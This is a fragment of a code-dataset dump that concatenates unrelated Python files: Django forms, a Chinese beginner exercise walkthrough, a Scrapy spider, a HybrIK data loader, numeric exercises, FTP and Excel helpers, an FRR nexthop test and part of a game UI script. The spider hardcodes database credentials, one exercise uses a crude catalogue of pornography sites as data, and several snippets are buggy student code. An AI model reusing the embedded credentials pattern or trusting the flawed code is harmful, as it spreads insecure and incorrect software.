address',\n\t\t\t\t\t\t'class': 'form-control contact-input',\n\t\t\t\t\t})\n\t\t\t\t)\n\tmessage = forms.CharField(label=\"Your Message:\", max_length=2000,\n\t\t\t\t\twidget=forms.Textarea(\n\t\t\t\t\tattrs={\n\t\t\t\t\t\t'placeholder': 'Your message',\n\t\t\t\t\t\t'class': 'form-control contact-msg',\n\t\t\t\t\t\t'rows': 10,\n\t\t\t\t\t\t'cols': 50,\n\t\t\t\t\t})\n\t\t\t\t)\n\n\n\tdef clean_email(self, *args, **kwargs):\n\t\temail = self.cleaned_data.get(\"email\")\n\t\tif not \"@\" in email:\n\t\t\traise ValidationError(\"This is not a valid email address.\")\n\t\treturn 
email","sub_path":"invator/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"443476795","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/12/26 17:35\n# @Author : xxx\n# @Email : xxx@admin.com\n# @File : 09 昨日作业讲解.py\n# @Software: PyCharm\n\n\n# 1.有如下变量(tu是个元祖),请实现要求的功能\ntu = (\"alex\", [11, 22, {\"k1\": 'v1', \"k2\": [\"age\", \"name\"], \"k3\": (11,22,33)}, 44])\n# a. 讲述元祖的特性\n\n# b. 请问tu变量中的第一个元素 \"alex\" 是否可被修改?\n# 不能\n\n# c. 请问tu变量中的\"k2\"对应的值是什么类型?是否可以被修改?如果可以,请在其中添加一个元素 \"Seven\"\n# tu[1][2][\"k2\"].append(\"Seven\")\n# print(tu)\n\n# d. 请问tu变量中的\"k3\"对应的值是什么类型?是否可以被修改?如果可以,请在其中添加一个元素 \"Seven\"\n# print(tu[1][2][\"k3\"])\n# tu[1][2][\"k3\"].append(\"Seven\")\n# print(tu)\n\n# 2.字典dic,dic = {'k1': \"v1\", \"k2\": \"v2\", \"k3\": [11,22,33]}\ndic = {'k1': \"v1\", \"k2\": \"v2\", \"k3\": [11,22,33]}\n# 请循环输出所有的key\nprint(dic.keys())\n\n# 请循环输出所有的value\nfor i in dic.values():\n print(i)\n\n# c. 请循环输出所有的key和value\nfor k, v in dic.items():\n print(k, v)\n\n# d. 请在字典中添加一个键值对,\"k4\": \"v4\",输出添加后的字典\n# dic[\"k4\"] = \"v4\"\n# print(dic)\n\n# e. 请在修改字典中 \"k1\" 对应的值为 \"alex\",输出修改后的字典\n# dic[\"k1\"] = \"alex\"\n# print(dic)\n\n# f. 请在k3对应的值中追加一个元素 44,输出修改后的字典\n# 用列表的append方法\n# g. 请在k3对应的值的第 1 个位置插入个元素 18,输出修改后的字典\n# dic[\"k3\"].insert(0, 18)\n\nav_catalog = {\n \"欧美\":{\n \"www.太白.com\": [\"很多免费的,世界最大的\",\"质量一般\"],\n \"www.alex.com\": [\"很多免费的,也很大\",\"质量比yourporn高点\"],\n \"oldboy.com\": [\"多是自拍,高质量图片很多\",\"资源不多,更新慢\"],\n \"hao222.com\":[\"质量很高,真的很高\",\"全部收费,屌丝请绕过\"]\n },\n \"日韩\":{\n \"tokyo-hot\":[\"质量怎样不清楚,个人已经不喜欢日韩范了\",\"verygood\"]\n },\n \"大陆\":{\n \"1024\":[\"全部免费,真好,好人一生平安\",\"服务器在国外,慢\"]\n }\n}\n# a,给此 [\"很多免费的,世界最大的\",\"质量一般\"]列表第二个位置插入一个 元素:'量很大'。\n# b,将此 [\"质量很高,真的很高\",\"全部收费,屌丝请绕过\"]列表的 \"全部收费,屌丝请绕过\" 删除。\n# c,将此[\"质量怎样不清楚,个人已经不喜欢日韩范了\",\"verygood\"]列表的 \"verygood\"全部变成大写。\n# d,给 '大陆' 对应的字典添加一个键值对 '1048' :['一天就封了']\n# e,给 '大陆' 对应的字典添加一个键值对 \"oldboy.com\": [\"多是自拍,高质量图片很多\",\"资源不多,更新慢\"]\n# f,给此[\"全部免费,真好,好人一生平安\",\"服务器在国外,慢\"]列表的第一个元素,加上一句话:'可以爬下来'\n# print(av_catalog['大陆'])\n# dic2 = av_catalog['大陆']\n# # print(dic2['1024'])\n# old_str = dic2['1024'][0]\n# new_str = old_str + '可以爬下来'\n# dic2['1024'][0] = new_str\n# print(av_catalog)\n# av_catalog['大陆']['1024'][0] = av_catalog['大陆']['1024'][0] + '可以爬下来'\nav_catalog['大陆']['1024'][0] += '可以爬下来'\n# 4.有字符串\"k: 1|k1 :2|k2:3 |k3 :4\" 处理成字典 {'k':1,'k1':2....} (升级题)\n# s1 = \" k: 1|k1 :2|k2:3 |k3 : 4 \"\n# dic = {}\n# l1 = s1.split('|')\n# # print(l1)\n# for i in l1:\n# l = i.split(':')\n# dic[l[0].strip()] = int(l[1])\n# print(dic)\n# {'k':1,'k1':2....}\n'''\ndic['k'] = 1\ndic['k1'] = 2\nprint(dic)\n'''\n\n\n\n# 5.元素分类\n# 有如下值li= [11,22,33,44,55,66,77,88,99,90],将所有大于 66 的值保存至字典的第一个key中,将小于 66 的值保存至第二个key的值中。\n# 即: {'k1': 大于66的所有值列表, 'k2': 小于66的所有值列表}\nli= [11,22,33,44,55,66,77,88,99,90]\nnew_dict = {'k1': [], 'k2': []}\nfor i in li:\n if i > 66:\n new_dict[\"k1\"].append(i)\n elif i < 66:\n new_dict[\"k2\"].append(i)\n\n# 6.输出商品列表,用户输入序号,显示用户选中的商品\n# 商品列表:\n# goods = [{\"name\": \"电脑\", \"price\": 1999},\n# {\"name\": \"鼠标\", \"price\": 10},\n# {\"name\": \"游艇\", \"price\": 20},\n# {\"name\": \"美女\", \"price\": 998}, ]\n#\n# 要求:\n# 1:页面显示 序号 + 商品名称 + 商品价格,如:\n# 1 电脑 1999\n# 2 鼠标 10\n# …\n# 2:用户输入选择的商品序号,然后打印商品名称及商品价格\n# 3:如果用户输入的商品序号有误,则提示输入有误,并重新输入。\n# 4:用户输入Q或者q,退出程序。","sub_path":"day06/09 昨日作业讲解.py","file_name":"09 
昨日作业讲解.py","file_ext":"py","file_size_in_byte":4613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"333220079","text":"from crawler.spiders import BaseSpider\nimport scrapy\nfrom utils.util_old import *\nfrom crawler.items import *\nfrom bs4 import BeautifulSoup as bs\nfrom scrapy.http import Request, Response\nimport time\nimport datetime\n\n#author:詹婕妤\n\nclass AgrasamacharSpider(BaseSpider):\n name = 'agrasamachar'\n website_id = 1150 # 网站的id(必填)\n language_id = 1930 # 所用语言的id\n allowed_domains = ['www.agrasamachar.com']\n start_urls = ['https://www.agrasamachar.com/',]\n sql = { # sql配置\n 'host': '192.168.235.162',\n 'user': 'dg_admin',\n 'password': 'dg_admin',\n 'db': 'dg_crawler'\n }\n month = {'जनवरी': 1, 'फ़रवरी': 2, 'मार्च': 3, 'अप्रैल': 4, 'मई': 5, 'जून': 6, 'जुलाई': 7, 'अगस्त': 8,\n 'सितंबर': 9, 'अक्तूबर': 10, 'नवंबर': 11, 'दिसंबर': 12}\n # 这是类初始化函数,用来传时间戳参数\n \n \n \n def parse(self, response):\n soup = bs(response.text,'html.parser')\n for i in soup.find_all(class_='post-title entry-title'):\n url = i.find('a').get('href')\n yield scrapy.Request(url,callback=self.parse_news)\n if soup.find(class_='blog-pager-older-link'):\n next_url = soup.find('a',class_='blog-pager-older-link').get('href')\n pub_time1 = soup.find_all(class_='date-header')[-1].find('span').text\n pub_time = time.strftime(\"%Y-%m-%d %H:%M:%S\",datetime.datetime(int(pub_time1.split()[-1]), self.month[pub_time1.split()[1]],int(pub_time1.split()[0])).timetuple())\n if self.time == None or Util.format_time3(pub_time) >= int(self.time):\n yield scrapy.Request(next_url,callback=self.parse)\n else:\n self.logger.info('时间截止')\n\n def parse_news(self,response):\n item = NewsItem()\n soup = bs(response.text,'html.parser')\n try:\n title = soup.find(class_='post-title entry-title').text.strip()\n images = [i.get('src') for i in soup.select('.tr-caption-container img')] if soup.select('.tr-caption-container img') else []\n body = soup.find(class_='post-body entry-content').text\n pub_time = soup.find(class_='date-header').find('span').text\n item['title'] = title\n item['images'] = images\n item['pub_time'] = time.strftime(\"%Y-%m-%d %H:%M:%S\",datetime.datetime(int(pub_time.split()[-1]), self.month[pub_time.split()[1]],int(pub_time.split()[0])).timetuple())\n item['body'] = body.replace('\\xa0','\\n').strip()\n item['abstract'] = item['body'].split('\\n')[0]\n item['category1'] = None\n item['category2'] = None\n except Exception:\n pass\n yield item\n","sub_path":"crawler/v1/agrasamachar.py","file_name":"agrasamachar.py","file_ext":"py","file_size_in_byte":2862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"539051830","text":"from PIL import Image, ImageOps\nimport matplotlib.pyplot as plt\n\nimg=Image.open(r'C:\\Users\\16254\\Desktop\\最囧游戏素材\\蜡烛.png')\n# box=(100,100,500,500)\n# region=img.crop(box) #此时,region是一个新的图像对象。\nim = ImageOps.autocontrast(img, 20)\nfor i in range(100):\n for j in range(100):\n img.putpixel((i, j), (255, 255, 255))\n\n\nplt.figure(\"dog\")\nplt.imshow(img)\nplt.show()","sub_path":"picturePNGEdit.py","file_name":"picturePNGEdit.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"159336246","text":"import random\n\nfrom django.core.management import BaseCommand\nfrom account.models import Workers\n\n\nclass Command(BaseCommand):\n help = \"Create slug for all Workers model\"\n\n def 
handle(self, *args, **options):\n        print(\"Started ................>>>>\")\n        workers = Workers.objects.all()\n\n        for worker in workers:\n            worker.salary = random.randint(500,1500)\n            worker.save()\n            print(\"{}\".format(worker.slug))\n\n        print(\"Complete [OK]\")\n","sub_path":"account/management/commands/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"455400073","text":"import bisect\nimport random\n\nimport torch\nimport torch.utils.data as data\n\nfrom .h36m_smpl import H36mSMPL\nfrom .hp3d import HP3D\nfrom .mscoco import Mscoco\n\ns_mpii_2_smpl_jt = [\n    6, 3, 2,\n    -1, 4, 1,\n    -1, 5, 0,\n    -1, -1, -1,\n    8, -1, -1,\n    -1,\n    13, 12,\n    14, 11,\n    15, 10,\n    -1, -1\n]\ns_3dhp_2_smpl_jt = [\n    4, -1, -1,\n    -1, 19, 24,\n    -1, 20, 25,\n    -1, -1, -1,  # TODO: foot point\n    5, -1, -1,\n    -1,\n    9, 14,\n    10, 15,\n    11, 16,\n    -1, -1\n]\ns_coco_2_smpl_jt = [\n    -1, -1, -1,\n    -1, 13, 14,\n    -1, 15, 16,\n    -1, -1, -1,\n    -1, -1, -1,\n    -1,\n    5, 6,\n    7, 8,\n    9, 10,\n    -1, -1\n]\n\ns_smpl24_jt_num = 24\n\n\nclass MixDataset(data.Dataset):\n    CLASSES = ['person']\n    EVAL_JOINTS = [6, 5, 4, 1, 2, 3, 16, 15, 14, 11, 12, 13, 8, 10]\n\n    num_joints = 24\n    bbox_3d_shape = (2000, 2000, 2000)\n    joints_name_17 = (\n        'Pelvis',  # 0\n        'L_Hip', 'L_Knee', 'L_Ankle',  # 3\n        'R_Hip', 'R_Knee', 'R_Ankle',  # 6\n        'Torso', 'Neck',  # 8\n        'Nose', 'Head',  # 10\n        'L_Shoulder', 'L_Elbow', 'L_Wrist',  # 13\n        'R_Shoulder', 'R_Elbow', 'R_Wrist',  # 16\n    )\n    joints_name_24 = (\n        'pelvis', 'left_hip', 'right_hip',  # 2\n        'spine1', 'left_knee', 'right_knee',  # 5\n        'spine2', 'left_ankle', 'right_ankle',  # 8\n        'spine3', 'left_foot', 'right_foot',  # 11\n        'neck', 'left_collar', 'right_collar',  # 14\n        'jaw',  # 15\n        'left_shoulder', 'right_shoulder',  # 17\n        'left_elbow', 'right_elbow',  # 19\n        'left_wrist', 'right_wrist',  # 21\n        'left_thumb', 'right_thumb'  # 23\n    )\n    data_domain = set([\n        'type',\n        'target_theta',\n        'target_theta_weight',\n        'target_beta',\n        'target_smpl_weight',\n        'target_uvd_29',\n        'target_xyz_24',\n        'target_weight_24',\n        'target_weight_29',\n        'target_xyz_17',\n        'target_weight_17',\n        'trans_inv',\n        'intrinsic_param',\n        'joint_root',\n        'target_twist',\n        'target_twist_weight',\n        'depth_factor'\n    ])\n\n    def __init__(self,\n                 cfg,\n                 train=True):\n        self._train = train\n        self.heatmap_size = cfg.MODEL.HEATMAP_SIZE\n\n        if train:\n            self.db0 = H36mSMPL(\n                cfg=cfg,\n                ann_file=cfg.DATASET.SET_LIST[0].TRAIN_SET,\n                train=True)\n            self.db1 = Mscoco(\n                cfg=cfg,\n                ann_file=f'person_keypoints_{cfg.DATASET.SET_LIST[1].TRAIN_SET}.json',\n                train=True)\n            self.db2 = HP3D(\n                cfg=cfg,\n                ann_file=cfg.DATASET.SET_LIST[2].TRAIN_SET,\n                train=True)\n\n            self._subsets = [self.db0, self.db1, self.db2]\n            self._2d_length = len(self.db1)\n            self._3d_length = len(self.db0) + len(self.db2)\n        else:\n            self.db0 = H36mSMPL(\n                cfg=cfg,\n                ann_file=cfg.DATASET.SET_LIST[0].TEST_SET,\n                train=train)\n\n            self._subsets = [self.db0]\n\n        self._subset_size = [len(item) for item in self._subsets]\n        self._db0_size = len(self.db0)\n\n        if train:\n            self.max_db_data_num = max(self._subset_size)\n            self.tot_size = 2 * max(self._subset_size)\n            self.partition = [0.4, 0.5, 0.1]\n        else:\n            self.tot_size = self._db0_size\n            self.partition = [1]\n\n        self.cumulative_sizes = self.cumsum(self.partition)\n\n        self.joint_pairs_24 = self.db0.joint_pairs_24\n        self.joint_pairs_17 = self.db0.joint_pairs_17\n        self.root_idx_17 = self.db0.root_idx_17\n        self.root_idx_smpl = self.db0.root_idx_smpl\n        
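# Sampling sketch (illustrative, derived from the values above): with\n        # partition = [0.4, 0.5, 0.1], cumsum() gives cumulative_sizes = [0.4, 0.9, 1.0];\n        # in __getitem__ below a uniform draw p is mapped to a dataset via\n        # bisect_right, e.g. p = 0.65 -> index 1 -> Mscoco, so H36M, COCO and\n        # 3DHP are mixed at roughly 40/50/10 during training.\n        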
self.evaluate_xyz_17 = self.db0.evaluate_xyz_17\n self.evaluate_uvd_24 = self.db0.evaluate_uvd_24\n self.evaluate_xyz_24 = self.db0.evaluate_xyz_24\n\n @staticmethod\n def cumsum(sequence):\n r, s = [], 0\n for e in sequence:\n r.append(e + s)\n s += e\n return r\n\n def __len__(self):\n return self.tot_size\n\n def __getitem__(self, idx):\n assert idx >= 0\n if self._train:\n p = random.uniform(0, 1)\n\n dataset_idx = bisect.bisect_right(self.cumulative_sizes, p)\n\n _db_len = self._subset_size[dataset_idx]\n\n # last batch: random sampling\n if idx >= _db_len * (self.tot_size // _db_len):\n sample_idx = random.randint(0, _db_len - 1)\n else: # before last batch: use modular\n sample_idx = idx % _db_len\n else:\n dataset_idx = 0\n sample_idx = idx\n\n img, target, img_id, bbox = self._subsets[dataset_idx][sample_idx]\n\n if dataset_idx > 0:\n # COCO, 3DHP\n label_jts_origin = target.pop('target')\n label_jts_mask_origin = target.pop('target_weight')\n\n label_uvd_29 = torch.zeros(29, 3)\n label_xyz_24 = torch.zeros(24, 3)\n label_uvd_29_mask = torch.zeros(29, 3)\n label_xyz_17 = torch.zeros(17, 3)\n label_xyz_17_mask = torch.zeros(17, 3)\n\n if dataset_idx == 1:\n # COCO\n assert label_jts_origin.dim() == 1 and label_jts_origin.shape[0] == 17 * 2, label_jts_origin.shape\n\n label_jts_origin = label_jts_origin.reshape(17, 2)\n label_jts_mask_origin = label_jts_mask_origin.reshape(17, 2)\n\n for i in range(s_smpl24_jt_num):\n id1 = i\n id2 = s_coco_2_smpl_jt[i]\n if id2 >= 0:\n label_uvd_29[id1, :2] = label_jts_origin[id2, :2].clone()\n label_uvd_29_mask[id1, :2] = label_jts_mask_origin[id2, :2].clone()\n elif dataset_idx == 2:\n # 3DHP\n assert label_jts_origin.dim() == 1 and label_jts_origin.shape[0] == 28 * 3, label_jts_origin.shape\n\n label_jts_origin = label_jts_origin.reshape(28, 3)\n label_jts_mask_origin = label_jts_mask_origin.reshape(28, 3)\n\n for i in range(s_smpl24_jt_num):\n id1 = i\n id2 = s_3dhp_2_smpl_jt[i]\n if id2 >= 0:\n label_uvd_29[id1, :3] = label_jts_origin[id2, :3].clone()\n label_uvd_29_mask[id1, :3] = label_jts_mask_origin[id2, :3].clone()\n\n label_uvd_29 = label_uvd_29.reshape(-1)\n label_xyz_24 = label_xyz_24.reshape(-1)\n label_uvd_24_mask = label_uvd_29_mask[:24, :].reshape(-1)\n label_uvd_29_mask = label_uvd_29_mask.reshape(-1)\n label_xyz_17 = label_xyz_17.reshape(-1)\n label_xyz_17_mask = label_xyz_17_mask.reshape(-1)\n\n target['target_uvd_29'] = label_uvd_29\n target['target_xyz_24'] = label_xyz_24\n target['target_weight_24'] = label_uvd_24_mask\n target['target_weight_29'] = label_uvd_29_mask\n target['target_xyz_17'] = label_xyz_17\n target['target_weight_17'] = label_xyz_17_mask\n target['target_theta'] = torch.zeros(24 * 4)\n target['target_beta'] = torch.zeros(10)\n target['target_smpl_weight'] = torch.zeros(1)\n target['target_theta_weight'] = torch.zeros(24 * 4)\n target['target_twist'] = torch.zeros(23, 2)\n target['target_twist_weight'] = torch.zeros(23, 2)\n else:\n assert set(target.keys()).issubset(self.data_domain), (set(target.keys()) - self.data_domain, self.data_domain - set(target.keys()),)\n target.pop('type')\n\n return img, target, img_id, bbox\n","sub_path":"hybrik/datasets/mix_dataset.py","file_name":"mix_dataset.py","file_ext":"py","file_size_in_byte":7896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"332060720","text":"\"\"\"\nauthor: madplayer\ne_mail: kch9001@gmail.com\n\"\"\"\nimport numpy as np\n\ndef Integration(y, x):\n \"\"\"\n y is value list\n y = f(x)\n x[i + 
1] - x[i] = const (uniform grid)\n\n    Returns the running (cumulative) Simpson integral sampled at every\n    other grid point, together with those x positions.\n    \"\"\"\n    size = len(x)\n    j = 0\n    h = x[1] - x[0]\n\n    if (size - 1) % 2 != 0:\n        # odd number of intervals: Simpson 1/3 on pairs of intervals,\n        # Simpson 3/8 on the final three intervals\n        ans = np.zeros(int(size / 2)-1)\n        ans_x = np.zeros(int(size / 2)-1)\n        for i in range(2, size - 2, 2):\n            ans[j] += h / 3 * (y[i] + 4*y[i-1] + y[i-2])\n            ans[j + 1] += ans[j]  # carry the running total forward\n            ans_x[j] = x[i]\n            j += 1\n        # 3/8 rule weights are 1, 3, 3, 1\n        ans[j] += 3*h/ 8 * \\\n            (y[size-1] + 3*y[size-2] + 3*y[size-3] + y[size-4])\n        ans_x[j] = x[size - 1]\n    else:\n        # even number of intervals: plain composite Simpson 1/3;\n        # arrays sized to the sample points x[2], x[4], ..., x[size-1]\n        ans = np.zeros(int(size / 2))\n        ans_x = np.zeros(int(size / 2))\n        for i in range(2, size, 2):\n            ans[j] += h / 3 * (y[i] + 4*y[i-1] + y[i-2])\n            if j + 1 < len(ans):\n                ans[j + 1] += ans[j]  # carry the running total forward\n            ans_x[j] = x[i]\n            j += 1\n\n    return ans, ans_x\n","sub_path":"Integration/Simpson_Rule.py","file_name":"Simpson_Rule.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"612566597","text":"#PROJECT EULER PROBLEM 97\r\n# computes the last ten digits of 28433*2^7830457 + 1,\r\n# keeping only the last ten digits of the power at each step\r\n\r\nproduct = 2\r\n\r\nfor each in range(1,7830457):\r\n    product *= 2\r\n    word = str(product)\r\n    if len(word)> 10:\r\n        word = word[-10:]\r\n        product = int(word)\r\n\r\nproduct = product *28433 + 1\r\n\r\ntemp = str(product)\r\nprint(temp[-10:])\r\n","sub_path":"97.py","file_name":"97.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"145154954","text":"from random import randint\n\n# dice faces run 1-6, so randint(1, 6)\ndado1 = randint(1, 6)\ndado2 = randint(1, 6)\ndado3 = randint(1, 6)\ndados = dado1 + dado2 + dado3\ndinheiros = 10\ndica = 0\nchute = 0\n\n# hint phase\n\nwhile dica != 'não':\n    resposta_perdeu = \"Você perdeu!\"\n    print(dinheiros)\n    if dinheiros == 0:\n        print(resposta_perdeu)\n        break\n    else:\n        dica = input(\"você quer uma dica?\")  # read the user's answer\n        if dica == \"sim\":\n            n1 = int(input(\"digite um número\"))\n            n2 = int(input(\"digite um número\"))\n            n3 = int(input(\"digite um número\"))\n            if n1 == dados or n2 == dados or n3 == dados:\n                print(\"Está entre os 3\")\n            else:\n                print(\"Não está entre os 3\")\n            dinheiros -= 1\n\n# guessing phase\n\nwhile chute != dados:\n    resposta_ganhou = \"você ganhou com {0}\".format(dinheiros)\n    resposta_perdeu = \"Você perdeu!\"\n    print(dinheiros)\n    if dinheiros == 0:\n        print(resposta_perdeu)\n        break\n    else:\n        chute = int(input(\"Chute um número\"))  # input() returns str; compare as int\n        if chute != dados:\n            dinheiros -= 1\n        else:\n            dinheiros += dinheiros*5\n            print(resposta_ganhou)","sub_path":"backup/user_212/ch136_2020_04_01_12_27_19_355004.py","file_name":"ch136_2020_04_01_12_27_19_355004.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"565170321","text":"#pip install openpyxl\nimport openpyxl as oxl\n\nexcel = oxl.load_workbook('emails.xlsx')\ndata = excel['Sheet1']\n\nlast_row = data.max_row\n\nemails = []\nnames = []\n\nfor i in range(2, last_row+1):\n    flag = data.cell(row=i, column=3).value\n    if flag !='N':\n        names.append(data.cell(row=i, column=1).value)\n\nfor i in range(2, last_row+1):\n    flag = data.cell(row=i, column=3).value\n    if flag !='N':\n        emails.append(data.cell(row=i, column=2).value)\n\nprint(names)\nprint(emails)","sub_path":"Working with Email/3_3-working_with_excel.py","file_name":"3_3-working_with_excel.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"521416569","text":"import sys\nfrom ftplib import FTP\nfrom ftplib import all_errors\nimport logging\n\n\nclass MyFTP:\n    def __init__(self, ftp_host):\n        self.ftp = FTP(ftp_host)\n\n    def 
connect(self, user_name, password):\n        try:\n            resp = self.ftp.login(user=user_name, passwd=password)\n            logging.info(resp)\n            return \"230\" in resp\n        except all_errors as e:\n            logging.error(e)\n            sys.exit(1)\n\n    def check_files_count_in_current_directory(self):\n        files = []\n        self.ftp.retrlines(\"LIST\", files.append)\n        return len(files)\n\n    def is_file_in_current_directory(self, filename):\n        directory = []\n        self.ftp.retrlines(\"LIST\", directory.append)\n        for file in directory:\n            if filename in file:\n                return True\n        return False\n\n    def upload_file(self, filename):\n        with open(filename, \"rb\") as f:\n            try:\n                resp = self.ftp.storbinary(\"\".join([\"STOR \", filename]), f)\n                logging.info(resp)\n                return \"226\" in resp\n            except all_errors as e:\n                logging.error(e)\n                return False\n\n    def download_file(self, filename, download_filename):\n        with open(download_filename, 'wb') as f:\n            try:\n                resp = self.ftp.retrbinary(\"\".join([\"RETR \", filename]), f.write)\n                logging.info(resp)\n                return \"226\" in resp\n            except all_errors as e:\n                logging.error(e)\n                return False\n\n    def create_dir(self, dirname):\n        try:\n            resp = self.ftp.mkd(dirname)\n            logging.info(resp)\n            return True  # explicit success indicator, matching the False on error\n        except all_errors as e:\n            logging.error(e)\n            return False\n\n    def delete_dir(self, dirname):\n        try:\n            resp = self.ftp.rmd(dirname)\n            logging.info(resp)\n            return True  # explicit success indicator, matching the False on error\n        except all_errors as e:\n            logging.error(e)\n            return False\n\n    def change_dir(self, dirname):\n        try:\n            resp = self.ftp.cwd(dirname)\n            logging.info(resp)\n            return True  # explicit success indicator, matching the False on error\n        except all_errors as e:\n            logging.error(e)\n            return False\n\n    def get_current_dir(self):\n        logging.info(self.ftp.pwd())\n        return self.ftp.pwd()\n\n    def close(self):\n        self.ftp.close()\n","sub_path":"Lesson21/task2/my_ftplib.py","file_name":"my_ftplib.py","file_ext":"py","file_size_in_byte":2313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"302504434","text":"import os, sys, subprocess, re, time\nfrom pprint import pprint\n\n\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nthis_dir = os.path.dirname(os.path.realpath(__file__))\nref_file = '%s/nexthop-group.ref' % (this_dir)\n\n\ndef test_read_nhgs():\n    \"\"\"Testing if the kernel nexthops were read in properly.\"\"\"\n\n    print(\"\\n\\n** Verifying nexthops read from kernel\")\n    print(\"*******************************************\\n\")\n\n    print(\"Verify show nexthop-group\")\n    print(\"-------------------------\\n\")\n\n    result = str(subprocess.getoutput('vtysh -c \"show nexthop-group\"'))\\\n        .expandtabs(8)\n\n    with open(ref_file) as f:\n        groups = f.read().strip().rsplit('\\n\\n')\n        for group in groups:\n            print(group)\n            assert group in result,\\\n                (\n                    \"\\nExpected\"\n                    \"\\n----------\"\n                    \"\\n%s\"\n                    \"\\nActual\"\n                    \"\\n----------\"\n                    \"\\n%s\"\\\n                    % (group, result)\\\n                )\n\ndef test_del_nhg():\n    \"\"\"Testing delete nexthop still used re-install.\"\"\"\n\n    print(\"\\n\\n** Verifying nexthop still used re-install\")\n    print(\"*******************************************\\n\")\n\n    with open(ref_file) as f:\n        # Delete a nexthop still being referenced\n        groups = f.read().strip().rsplit('\\n\\n')\n        g_id = 0\n        g_refcnt = 0\n\n        for group in groups:\n            g_id = int(re.findall(r'(?:ID: )([0-9]+)', group)[0])\n            g_refcnt = int(re.findall(r'(?:RefCnt: )([0-9]+)', group)[0])\n            if g_refcnt:\n                break\n\n        subprocess.run('ip next del id %d' % g_id, shell=True)\n        time.sleep(2)\n        result = str(subprocess.getoutput('ip next ls'))\n        assert str(g_id) in 
result\n","sub_path":"tests/nhgs/test_nhgs.py","file_name":"test_nhgs.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"533588380","text":"#Find Digits\r\n\r\ntest=int(input())\r\nli=[None]*test\r\ncount=[None]*test\r\ncount=0\r\nfor i in range(0,test):\r\n li[i]=int(input())\r\n\r\ndef mod(x):\r\n count=0\r\n back=x\r\n while x>0:\r\n rem=x%10\r\n if rem != 0 and back%rem == 0:\r\n count=count+1\r\n x=x//10\r\n return count\r\n\r\nl=list(map(mod,li))\r\n\r\nfor i in range(0,test):\r\n print(l[i])\r\n","sub_path":"New folder/Divisibility by digits.py","file_name":"Divisibility by digits.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"342308435","text":"import ui\nimport chat\nimport app\nimport fgGHGjjFHJghjfFG1545gGG\nimport snd\nimport item\nimport GFHhg54GHGhh45GHGH\nimport uiToolTip \nimport wndMgr \nimport time\nimport grp\nimport mouseModule \nimport constInfo\nimport event\nimport settinginfo\n\nclass AchievementStatisticBoard(ui.ScriptWindow):\n\tfaceBoxIMG \t\t= {}\n\tfaceBoxBGIMG \t= {} \n\tDescThinBoard \t= {}\n\t\n\tAchievementTitle \t\t= {}\n\tAchievementText \t\t= {}\n\tAchievementCalcPoints\t= {}\n\t\n\tcat = 0\n\tdef __init__(self):\n\t\tui.ScriptWindow.__init__(self)\n\t\tself.LoadUI()\n\n\tdef __del__(self):\n\t\t#constInfo.CALOPEN = 1\n\t\tsettinginfo.Achievement_Statistic[\"status\"] = 0\n\t\tui.ScriptWindow.__del__(self)\n\t\tself.Board.Hide()\n\t\t\n\tdef LoadUI(self):\n\t\tsettinginfo.Achievement_Statistic[\"status\"] = 1\n\t\tself.Board = ui.BoardWithTitleBar()\n\t\tself.Board.SetSize(266, 415) # 266\n\t\tself.Board.SetCenterPosition()\n\t\tself.Board.AddFlag(\"movable\")\n\t\tself.Board.AddFlag(\"float\")\n\t\tself.Board.SetTitleName(\"Achievement-Statistik\")\n\t\tself.Board.SetCloseEvent(self.__del__)\n\t\tself.Board.Show()\n\n\t\tself.itemtooltip = uiToolTip.ItemToolTip() \n\t\tself.itemtooltip.HideToolTip()\t\n\n\t\tself.BossButtonUp = ui.Button()\n\t\tself.BossButtonUp.SetParent(self.Board)\n\t\tself.BossButtonUp.SetPosition(16,33)\n\t\tself.BossButtonUp.SetText(\"\")\n\t\tself.BossButtonUp.SetUpVisual(\"d:/ymir work/ui/game/windows/tab_button_large_01.sub\")\n\t\tself.BossButtonUp.SetOverVisual(\"d:/ymir work/ui/game/windows/tab_button_large_02.sub\")\n\t\tself.BossButtonUp.SetDownVisual(\"d:/ymir work/ui/game/windows/tab_button_large_03.sub\")\n\t\tself.BossButtonUp.SetEvent(ui.__mem_func__(self.ChangeActionMode), 1)\n\t\tself.BossButtonUp.Hide()\n\t\t\n\t\tself.BossButtonDown = ui.Button()\n\t\tself.BossButtonDown.SetParent(self.Board)\n\t\tself.BossButtonDown.SetPosition(16,33)\n\t\tself.BossButtonDown.SetText(\"\")\n\t\tself.BossButtonDown.SetUpVisual(\"d:/ymir work/ui/game/windows/tab_button_large_03.sub\")\n\t\tself.BossButtonDown.SetOverVisual(\"d:/ymir work/ui/game/windows/tab_button_large_03.sub\")\n\t\tself.BossButtonDown.SetDownVisual(\"d:/ymir work/ui/game/windows/tab_button_large_03.sub\")\n\t\tself.BossButtonDown.SetEvent(ui.__mem_func__(self.ChangeActionMode), 